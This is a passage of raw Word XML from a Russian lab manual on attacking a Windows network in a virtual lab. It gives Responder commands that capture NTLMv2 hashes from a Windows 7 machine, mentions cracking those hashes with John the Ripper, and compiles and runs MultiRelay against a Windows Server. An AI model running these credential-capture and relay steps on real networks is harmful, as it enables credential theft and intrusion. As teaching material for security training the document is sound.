      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017D46">
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r>
        <w:t>р</w:t>
      </w:r>
      <w:r w:rsidRPr="00017D46">
        <w:t>ассматривать все хосты будто бы они онлайн -- пропустить обнаружение хостов</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B772F07" w14:textId="16982BD6" w:rsidR="00017D46" w:rsidRDefault="00017D46" w:rsidP="0087263B">
      <w:r w:rsidRPr="00017D46">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00017D46">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="00017D46">
        <w:t xml:space="preserve"> &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017D46">
        <w:t>диапазон_портов</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017D46">
        <w:t xml:space="preserve">&gt; - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017D46">
        <w:t>канирование</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017D46">
        <w:t xml:space="preserve"> только определенных портов</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D65F45" w14:textId="7E6233D1" w:rsidR="00017D46" w:rsidRPr="00017D46" w:rsidRDefault="00017D46" w:rsidP="0087263B">
      <w:r w:rsidRPr="00017D46">
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">дополнительная информация по утилите: </w:t>
      </w:r>
      <w:r w:rsidRPr="00017D46">
        <w:t>https://kali.tools/?p=1317]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5467363A" w14:textId="77777777" w:rsidR="00017D46" w:rsidRDefault="00017D46" w:rsidP="00017D46">
      <w:r>
        <w:t>___________________________________________________________________</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1967B156" w14:textId="520D05F1" w:rsidR="00B473DE" w:rsidRDefault="00B473DE" w:rsidP="0087263B">
      <w:r>
        <w:t>Вы должны получить результат следующего вида:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491927A9" w14:textId="6A540237" w:rsidR="00B473DE" w:rsidRPr="00B473DE" w:rsidRDefault="00B473DE" w:rsidP="0087263B">
      <w:r w:rsidRPr="00726D86">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3437EFEF" wp14:editId="60FC6815">
            <wp:extent cx="5372850" cy="178142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65BA" w14:textId="44C24288" w:rsidR="00DF3A99" w:rsidRPr="00240ECE" w:rsidRDefault="00AD3E37" w:rsidP="0087263B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00240ECE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r w:rsidR="005B516C" w:rsidRPr="00240ECE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00240ECE">
        <w:t>З</w:t>
      </w:r>
      <w:r w:rsidR="005B516C">
        <w:t>апустить</w:t>
      </w:r>
      <w:r w:rsidR="005B516C" w:rsidRPr="00240ECE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005B516C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Responder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D6F3D7" w14:textId="70C6B946" w:rsidR="00FA26A8" w:rsidRPr="00FA26A8" w:rsidRDefault="00FA26A8" w:rsidP="0087263B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responder -I eth0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48327D6D" w14:textId="7061981E" w:rsidR="00AD7DC4" w:rsidRPr="00FA26A8" w:rsidRDefault="000478A8" w:rsidP="0087263B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA26A8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:t>Зайти</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA26A8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>в</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA26A8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA26A8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5402A014" w14:textId="77777777" w:rsidR="000478A8" w:rsidRPr="000478A8" w:rsidRDefault="000478A8" w:rsidP="0087263B">
      <w:r>
        <w:t xml:space="preserve">4.1. Нажать </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>win</w:t>
      </w:r>
      <w:r w:rsidRPr="000478A8">
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C4052C" w14:textId="77777777" w:rsidR="000478A8" w:rsidRPr="00C65DE1" w:rsidRDefault="000478A8" w:rsidP="0087263B">
      <w:r w:rsidRPr="00C65DE1">
        <w:t xml:space="preserve">4.2. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Ввести </w:t>
      </w:r>
      <w:hyperlink r:id="rId59" w:history="1">
        <w:r w:rsidR="00C65DE1" w:rsidRPr="00C65DE1">
          <w:rPr>
            <w:rStyle w:val="af1"/>
          </w:rPr>
          <w:t>\\</w:t>
        </w:r>
        <w:r w:rsidR="00C65DE1" w:rsidRPr="00A667CD">
          <w:rPr>
            <w:rStyle w:val="af1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>test</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="12071DA9" w14:textId="42E655DA" w:rsidR="00C65DE1" w:rsidRDefault="00C65DE1" w:rsidP="0087263B">
      <w:r w:rsidRPr="00C65DE1">
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Вернуться в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kali</w:t>
      </w:r>
      <w:r w:rsidRPr="00C65DE1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>и убедиться в наличии хэша</w:t>
      </w:r>
      <w:r w:rsidR="00071A0C">
        <w:t xml:space="preserve"> для </w:t>
      </w:r>
      <w:r w:rsidR="000B19B4">
        <w:t>созданного юзера</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19786729" w14:textId="4A2ABDF9" w:rsidR="002D6325" w:rsidRPr="000B19B4" w:rsidRDefault="00B67ABD" w:rsidP="00B67ABD">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:commentRangeStart w:id="8"/>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64C6E580" wp14:editId="00D1670D">
            <wp:extent cx="5400000" cy="188599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8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9E6CEC">
        <w:rPr>
          <w:rStyle w:val="af6"/>
        </w:rPr>
        <w:commentReference w:id="8"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3609AA79" w14:textId="1235F215" w:rsidR="001A5BFD" w:rsidRPr="002D6325" w:rsidRDefault="00BB36CC" w:rsidP="0087263B">
      <w:pPr>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D24C1">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">В </w:t>
      </w:r>
      <w:r w:rsidR="002D6325">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">атаке </w:t>
      </w:r>
      <w:r w:rsidRPr="005D24C1">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pass</w:t>
      </w:r>
      <w:r w:rsidRPr="005D24C1">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="005D24C1">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r w:rsidRPr="005D24C1">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="005D24C1">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hash</w:t>
      </w:r>
      <w:r w:rsidRPr="005D24C1">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002D6325" w:rsidRPr="005D24C1">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">злоумышленник </w:t>
      </w:r>
      <w:r w:rsidRPr="005D24C1">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>не сможет</w:t>
      </w:r>
      <w:r w:rsidR="002D6325">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002D6325" w:rsidRPr="005D24C1">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>использовать</w:t>
      </w:r>
      <w:r w:rsidR="002D6325">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> данные из </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002D6325">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NTMLv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002D6325" w:rsidRPr="002D6325">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>2-</w:t>
      </w:r>
      <w:r w:rsidR="002D6325">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SSP</w:t>
      </w:r>
      <w:r w:rsidR="002D6325" w:rsidRPr="002D6325">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002D6325">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Hash</w:t>
      </w:r>
      <w:r w:rsidRPr="005D24C1">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="002D6325">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">но </w:t>
      </w:r>
      <w:r w:rsidRPr="005D24C1">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">с помощью </w:t>
      </w:r>
      <w:r w:rsidRPr="005D24C1">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>John</w:t>
      </w:r>
      <w:r w:rsidRPr="00150CF3">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005D24C1">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r w:rsidRPr="00150CF3">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005D24C1">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ripper</w:t>
      </w:r>
      <w:r w:rsidR="002D6325">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> взлом может быть успешен.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BDDA1C6" w14:textId="3741BFD2" w:rsidR="00E302A0" w:rsidRPr="006A51F9" w:rsidRDefault="00763050" w:rsidP="0087263B">
      <w:r w:rsidRPr="00150CF3">
        <w:t>6.</w:t>
      </w:r>
      <w:r w:rsidR="00870B65" w:rsidRPr="00150CF3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00870B65">
        <w:t xml:space="preserve">Удалить созданную базу данных </w:t>
      </w:r>
      <w:r w:rsidR="002D6325">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Responder</w:t>
      </w:r>
      <w:r w:rsidR="00854B27">
        <w:t xml:space="preserve">. Это необходимо в связи с тем, </w:t>
      </w:r>
      <w:r w:rsidR="00C925BE">
        <w:t>что,</w:t>
      </w:r>
      <w:r w:rsidR="00854B27">
        <w:t xml:space="preserve"> единожды получив базу данных</w:t>
      </w:r>
      <w:r w:rsidR="00C925BE">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00854B27">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00854B27">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Responder</w:t>
      </w:r>
      <w:r w:rsidR="00854B27">
        <w:t xml:space="preserve"> не соберёт данные повторно</w:t>
      </w:r>
      <w:r w:rsidR="00B67ABD">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7093FD25" w14:textId="77777777" w:rsidR="00763050" w:rsidRPr="00B60F19" w:rsidRDefault="00763050" w:rsidP="0087263B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ctrl</w:t>
      </w:r>
      <w:r w:rsidRPr="00B60F19">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="60D4BC09" w14:textId="2559124E" w:rsidR="006A51F9" w:rsidRPr="006A51F9" w:rsidRDefault="00837E79" w:rsidP="00837E79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r w:rsidR="00763050">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rm</w:t>
      </w:r>
      <w:r w:rsidR="00763050" w:rsidRPr="00B60F19">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/share/responder/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Responder.db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1B7024D4" w14:textId="1CF37812" w:rsidR="00A43CAC" w:rsidRPr="00017D46" w:rsidRDefault="00A43CAC" w:rsidP="0087263B">
      <w:r w:rsidRPr="00017D46">
        <w:t xml:space="preserve">7. </w:t>
      </w:r>
      <w:r>
        <w:t>Открыть</w:t>
      </w:r>
      <w:r w:rsidRPr="00017D46">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>ещё</w:t>
      </w:r>
      <w:r w:rsidRPr="00017D46">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>один</w:t>
      </w:r>
      <w:r w:rsidRPr="00017D46">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>терминал</w:t>
      </w:r>
      <w:r w:rsidR="00017D46">
        <w:t xml:space="preserve"> для </w:t>
      </w:r>
      <w:r w:rsidR="00240ECE">
        <w:t xml:space="preserve">установки и </w:t>
      </w:r>
      <w:r w:rsidR="00240ECE">
        <w:t>запуска</w:t>
      </w:r>
      <w:r w:rsidR="00017D46">
        <w:t xml:space="preserve"> второго инструмента – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00017D46">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MultiRelay</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00017D46">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9C76D4" w14:textId="2146FA5D" w:rsidR="00240ECE" w:rsidRDefault="00126349" w:rsidP="00240ECE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r w:rsidR="00240ECE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">pip install </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00240ECE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pycrypto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3AFF8B3C" w14:textId="27E155A8" w:rsidR="000D0FA3" w:rsidRDefault="000D0FA3" w:rsidP="00240ECE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cd /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/share/responder/tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AEE517E" w14:textId="7F4B829C" w:rsidR="00DF5FAC" w:rsidRDefault="00327767" w:rsidP="0087263B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 w:rsidR="00BC4314" w:rsidRPr="00BC4314">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00240ECE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>responder-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00240ECE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MultiRelay</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CF2F2F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>h</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EDE908A" w14:textId="16842EE4" w:rsidR="00240ECE" w:rsidRDefault="00C925BE" w:rsidP="0087263B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r w:rsidRPr="00C925BE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>apt-get install gcc-mingw-w64-x86-64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6807A1DD" w14:textId="0A9FE720" w:rsidR="00C925BE" w:rsidRDefault="00126349" w:rsidP="0087263B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r w:rsidRPr="00126349">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x86_64-w64-mingw32-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00126349">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>gcc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00126349">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00126349">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00126349">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MultiRelay</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00126349">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00126349">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Runas.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00126349">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -o ./</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00126349">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MultiRelay</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00126349">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/bin/Runas.exe -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00126349">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>municode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00126349">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -lwtsapi32 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00126349">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>luserenv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="337268FA" w14:textId="6E23B78C" w:rsidR="000D0FA3" w:rsidRPr="00126349" w:rsidRDefault="000D0FA3" w:rsidP="0087263B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r w:rsidRPr="000D0FA3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x86_64-w64-mingw32-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000D0FA3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>gcc .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000D0FA3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000D0FA3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MultiRelay</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000D0FA3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000D0FA3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Syssvc.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000D0FA3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -o ./</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000D0FA3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MultiRelay</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000D0FA3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/bin/Syssvc.exe -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000D0FA3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>municode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="01CD712A" w14:textId="71337DBC" w:rsidR="00A93EE4" w:rsidRPr="00A93EE4" w:rsidRDefault="00A93EE4" w:rsidP="0087263B">
      <w:r w:rsidRPr="00A93EE4">
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">для внесения ясности в формулировку команды, найдите её элементы в официальном справочнике по </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kali</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:hyperlink r:id="rId61" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="af1"/>
          </w:rPr>
          <w:t>https://kali.tools/?p</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="af1"/>
          </w:rPr>
          <w:t>=</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="af1"/>
          </w:rPr>
          <w:t>1679</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00A93EE4">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Запомните данный источник информации о различных инструментах, представленных в ОС.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B93978" w14:textId="77777777" w:rsidR="00AA2109" w:rsidRPr="00CD5EB5" w:rsidRDefault="00AA2109" w:rsidP="0087263B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD5EB5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">8. </w:t>
      </w:r>
      <w:r>
        <w:t>Используем</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD5EB5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>против</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD5EB5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CF12B7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidR="00CF12B7" w:rsidRPr="00CD5EB5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CF12B7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B3DA21" w14:textId="77777777" w:rsidR="001D62B7" w:rsidRDefault="001D62B7" w:rsidP="00B82D89">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D62B7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001D62B7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> responder-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D62B7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MultiRelay</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001D62B7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -t 10.0.2.15 -u ALL</w:t>
      </w:r>
      <w:r w:rsidRPr="001D62B7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
